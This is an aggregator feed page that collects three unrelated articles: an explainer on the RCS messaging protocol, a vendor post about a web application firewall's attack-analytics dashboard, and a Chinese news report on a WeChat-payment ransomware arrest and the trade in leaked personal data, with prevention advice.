What is RCS and why you might want it

$
0
0

A lot of people have become bored with SMS messaging, and the tech industry is very aware of it. While services such as Apple’s iMessage, Facebook Messenger, and WhatsApp allow you to add photos, GIFs and videos to your messages, they are not universal solutions ― for example, you can’t send a WhatsApp message if your correspondent uses Facebook Messenger. The answer ― or so Google and other companies are hoping ― is Rich Communications Services or RCS.

What is RCS?

RCS is a new online protocol that was chosen for adoption by the GSM Association in 2008 and is meant to replace the current texting standard SMS (Short Message Service), which has been around since the 1990s. The GMSA represents a wide variety of organizations in the mobile industry, including device and software companies, internet companies, etc. Naturally, given all those players, it took a while to come to an agreement, and so it wasn’t until 2016 that the GSMA was able to come up with something resembling a standard. Called the Universal Profile, it is, according to the GMSA, a “single, industry-agreed set of features and technical enablers.”

How is RCS better than SMS?

RCS will add a lot more multimedia capabilities to your messaging. Besides the usual texts (plain and fancy), it will make it simple to send GIFs, high-resolution still photos, and videos. It will let you know if the person you’re texting is available, and can send you a receipt to prove they received your message. It will allow you to create longer messages and attach larger files. It also enables much better group messaging than SMS can handle. In other words, it can make standard text messaging look and work a lot like iMessage.

It will also make it easier for companies to interact with the customers. So, for example, RCS will allow you to quickly find out the status of an order, and will provide a way for companies to encourage customer comments on their sites. (Okay, that may not be top of your list of great features.)

As of this writing, support for RCS has been promised by 55 carriers including AT&T, Verizon, T-Mobile, and a slew of secondary companies; 11 hardware manufacturers such as Samsung, Lenovo, and LG (but not Apple), and both Microsoft and Google.

Is anyone using RCS yet?

Google, perhaps trying to make up for its elimination of the Allo app , just introduced an RCS-enabled messaging service called, rather confusingly, Chat (to distinguish it from all the other chat apps). Currently, Chat is only available on Pixel 3 and Pixel 3 XL phones that are on the Verizon network.

This means that people with those phones and using that carrier can send RCS messages (via Android Messages) or to other people with those phones and using that carrier. If you’ve got Chat, you can still send messages to somebody without the capability ― they will just get normal SMS texts. So it’s a fairly limited try-out, for now.


What is RCS and why you might want it

Google isn’t the only device maker offering RCS. T-Mobile added Universal Profile version 1.0 of RCS to its Samsung Galaxy S7 and S7 Edge phones in June. Sprint announced it was launching RCS with Universal Profile to its devices in early November, and promised that all its new 2019 devices would come with RCS preloaded. Anything using the “Universal Profile” standard should support cross-carrier messaging ― but if you look at the carrier sites, they only claim to communicate within their networks, and we have not yet been able to test whether RCS-capable T-Mobile or Sprint devices can exchange RCS messages with Pixel 3 phones.

Muddying the waters even more is the fact that some carriers and device makers are currently using RCS, but not the Universal Profile (which is being used by Chat), so their apps and services are not cross-compatible with those being used by other vendors.

Why are people saying it’s not secure?

One issue that a lot of security nerds are pointing out is that RCS ― and, therefore, apps such as Chat ― lack the end-to-end encryption available in some current messaging tools such as WhatsApp. End-to-end encryption means that the message is impenetrable to everyone ― including the app vendor and the network provider ― except the message sender and receiver. You want to text someone with no chance that the authorities will ever see it? Chat / RCS is not the way.

On the other hand, RCS does have all the standard security protocols, including Transport Layer Security ( the underlying tech behind HTTPS ), and IPsec (Internet Protocol Security), which is used in VPNs. So for the most part, it’s pretty secure. Whether you’re comfortable using Chat / RCS depends on your security needs.

So what’s next?

Right now, support for RCS is limited to only a few carriers and even fewer devices, which means that most people can’t yet take advantage of it. Stay tuned to see what ― and who ― follows.

Read: New Attack Analytics Dashboard Streamlines Security Investigations

$
0
0

Read: New Attack Analytics Dashboard Streamlines Security Investigations

Attack Analytics , launched this May, aimed to crush the maddening pace of alerts that security teams were receiving. For security analysts unable to triage this avalanche of alerts, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigable incidents. Powered by artificial intelligence, Attack Analytics is able to automate what would take a team of security analysts days to investigate and to cut that investigation time down to a matter of minutes.

Building upon the success of our launch, we are now introducing the Attack Analytics Dashboard. Aimed at SOC (Security Operations Center) analysts, managers, and WAF administrators to provide a high-level summary of the type of security attacks that are hitting their web applications; it helps to speed up security investigations and quickly zoom in on abnormal behaviors.

The WAF admin or the SOC can use the Dashboard to get a high-level summary of the security attacks that have happened over a period of time (the last 24 hours, 7 days, 30 days, 90 days or other customized time range):

Attack Trends: Incidents and events Top Geographic Areas: Where attacks have originated Top Attacked Resources Breakdown of Attack Tool Types Top Security Violations (Bad Bots, Illegal Resource Access, SQL injections, Cross-Site Scripting, etc.) Events vs. incidents

Upon entering the Attack Analytics Dashboard, you can see the Incidents tab, which shows the attack trends across time, classified according to severity (critical, major and minor). A quick scan allows you to understand if a sudden jump in incidents may deserve immediate attention.


Read: New Attack Analytics Dashboard Streamlines Security Investigations

In the Events tab, you can see the number of events vs. incidents which have occurred over a specific period of time. For example the marked point in the graph shows that on October 4 th there were 2,142 alerts that were clustered into 19 security incidents. If you want to understand what happened on this day, you can drill down and investigate these 19 incidents.


Read: New Attack Analytics Dashboard Streamlines Security Investigations

Next, you can see the Top Attack Origin countries which have attacked your websites over a specified period of time. This again could help identify any abnormal behavior from a specific country. In the snapshot below, you can see the “Distributed” incidents. This means that this customer experienced 4 distributed attacks, with no dominant country, and could imply the attacks originated from botnets spread across the world.


Read: New Attack Analytics Dashboard Streamlines Security Investigations
Top attacked resources

Top Attacked Resources provides a snapshot of your most attacked web resources by percentage of critical incidents and the total number of incidents. In this example, singular assets are examined as well as a distributed attack across the customer’s assets. In the 3 rd row, you can see that the customer (in this case, our own platform) experienced 191 distributed attacks. This means that each attack targeted a few hosts under our brand name; for example, it may have been a scanning attack aimed at finding vulnerable hosts.


Read: New Attack Analytics Dashboard Streamlines Security Investigations
Attack tool types

A SOC Manager/WAF admin might also want to understand the type of attack tools that are being used. In the example below, on the left, you see the distribution of incidents according to the tool types and on the right, you see the drill-down into the malicious tools, so you can better understand your attack landscape . Over the last 90 days, there were 2.38K incidents that used malicious tools. On the right we can see the breakdown of the different tools and the number of incidents for each one for example, there were 279 incidents with a dominant malicious tool called LTX71.


Read: New Attack Analytics Dashboard Streamlines Security Investigations
Read: New Attack Analytics Dashboard Streamlines Security Investigations

We think you’ll quickly discover the benefits which the new Attack Analytics Dashboard provides as it helps you pinpoint abnormal behaviors and speed up your security investigations. It should also assist you in providing other stakeholders within your company a high-level look at the value of your WAF.

And right now, we have even more dashboard insight enrichments in the works, such as:

False Positives Suspects: Incidents our algorithms predict to be highly probable of being false positives. Community Attacks (Spray and Pray Attacks): Provide a list of incidents that are targeting you as part of a larger campaign based on information gathered from our crowdsourced customer data.

Stay tuned for more!

The post Read: New Attack Analytics Dashboard Streamlines Security Investigations appeared first on Blog .

Recent Articles By Author

Enhanced Infrastructure DDoS Protection Analytics: Targeted Visibility for Greater Accuracy More from Kim Lambert

*** This is a Security Bloggers Network syndicated blog from Blog authored byKim Lambert. Read the original post at: https://www.imperva.com/blog/read-new-attack-analytics-dashboard-streamlines-security-investigations/

勒索病毒敲响网络安全警钟 黑灰产黑手伸向个人信息

$
0
0

电脑文档数据突然被加密了,桌面上则多了一个解密图标,点开就弹出微信支付收款码,要求转账110元才能解密……这就是近期“沸沸扬扬”的“微信支付”勒索病毒,不过多位安全专家表示,这仅是一款电脑病毒,与手机安全无关,也同微信支付本身的安全无关。

临近年关,各类诈骗层出不同。随着二维码、移动支付等的普及和超高使用率,这些给我们生活带来极大便利的高科技,正成为黑灰产团伙围攻和利用的对象。近日出现的微信支付勒索病毒,再次提醒我们要“捂紧”微信和支付宝的钱袋子。

在信息化、数据化的今天,个人信息成为重要的数据资源,数据安全风险日益凸显。个人信息泄露引发公众对信息安全的焦虑,保护个人信息安全,需多方联合防护。

“勒索式”病毒再度来袭

近日,国内出现首例要求通过微信来支付赎金的勒索病毒。目前,东莞网警已抓获一名95后的病毒研发制作者罗某。据了解,罗某涉嫌利用自制的病毒木马入侵用户计算机,通过加密受害者文件来勒索赎金,每次110元。同时,该病毒还非法获取5万余条淘宝、支付宝、百度网盘等各种账号、密码信息,全网超过10万台计算机被感染。

根据火绒安全发布的报告显示,该勒索通过加密txt、office文档等有价值数据,并在用户桌面释放一个“你的电脑文件已被加密,点此解密”的快捷方式,随后弹出解密教程和收款二维码,强迫受害缴付赎金。

业内专家表示,尽管这几年勒索病毒案件频频发生,但很多勒索病毒的水平不是很高。杀毒软件瑞星的安全团队称此次的勒索病毒为“小学生”级别,该病毒采用简单异或加密,且密钥相关数据被存放在病毒文件中,即使在不访问病毒作者服务器的情况下,也可以成功完成数据解密。

不过这次出现的勒索病毒还是让人们想起了一年半以前席卷全球的比特币勒索病毒“WannaCry”。据公开数据显示,这场全球性互联网灾难让150个国家、30万名用户中招,经济损失达80亿美元。该病毒也是通过加密受害者电脑里的重要文件来进行勒索,不同的是,被害者要支付比特币才能解锁。

黑灰产黑手伸向个人信息

在勒索病毒多发的同时,同样瞄准公众钱袋子的网络黑灰产还将黑手伸向个人信息。近日,据媒体报道,网上曝出花200元就可买约2600万陌陌数据;万豪国际旗下的酒店数据库被黑客入侵,超5亿人次客户信息遭泄露。

在这些信息数据泄露案的背后,都存在黑灰产团伙的身影。大数据协同安全技术国家工程实验室副主任左英男表示,大数据特别是个人信息数据在黑色产业中已被看作是高价值资源。

个人信息泄漏的严重性难以估量。在日前举行的2018(第三届)数据安全与隐私保护大会上,黑灰产业对个人数据保护产生的威胁成为共识:泄露的数据大多会被黑灰产团伙用于诈骗等牟利行为,对个人、社会和国家都产生恶劣危害。

公开资料显示,中国网络黑色产业从业人员已超过150万人,市场规模高达千亿级。个人信息泄漏的原因之一,是企业内部员工利益熏心,铤而走险倒卖客户个人信息。另一个重要原因则是手机App权限滥用造成个人信息泄露。很多App在安装时,要获取用户手机的定位、通讯录等权限,用户在手机的各种操作和信息都会被App搜集,毫无隐私可言。国家计算机病毒应急处理中心近期监测发现,多款移动应用在用户不知情的情况下,获取用户个人信息,造成用户隐私泄露。

筑牢网络信息安全防线

年底将至,网络信息安全需要引起社会多方重视。打击非法获取公民个人信息的行为,监管部门需加强执法力度,相关的企业信息收集者更要把责任承担起来,而消费者也要增强防范意识。

首先监管部门要重拳出击,完善律法。针对屡次发生的信息泄露事件,工信部近日表示,将开展移动恶意程序专项治理。业内人士表示,考虑到勒索病毒的严重社会危害性,司法机关在定罪量刑时应综合考虑犯罪情节,从一重罪(即敲诈勒索罪)论处,让不法之徒依法付出更大代价。

其次是要强化网络平台的法律责任。黑客技术迭代升级,但网络平台理应“魔高一尺道高一丈”。近期,中国消费者协会公布手机App个人信息泄露状况非常严重。网络平台应自觉做好包括排查风险隐患、强化防护技术手段、完善安全管理制度等。如果承担安全保护责任不到位,网络运营者也应被追责。

最后,消费者也需提高警惕。消费者应审慎授权个人敏感权限,慎重注册App和扫描二维码,同时还要避免在不同的网站使用相同的用户名和密码,提高密码设置的难度。电脑用户要养成备份重要数据和文件的习惯,通过正规渠道下载安装软件。若遭遇勒索,不要付款,及时报警。

Viewing all 12749 articles
Browse latest View live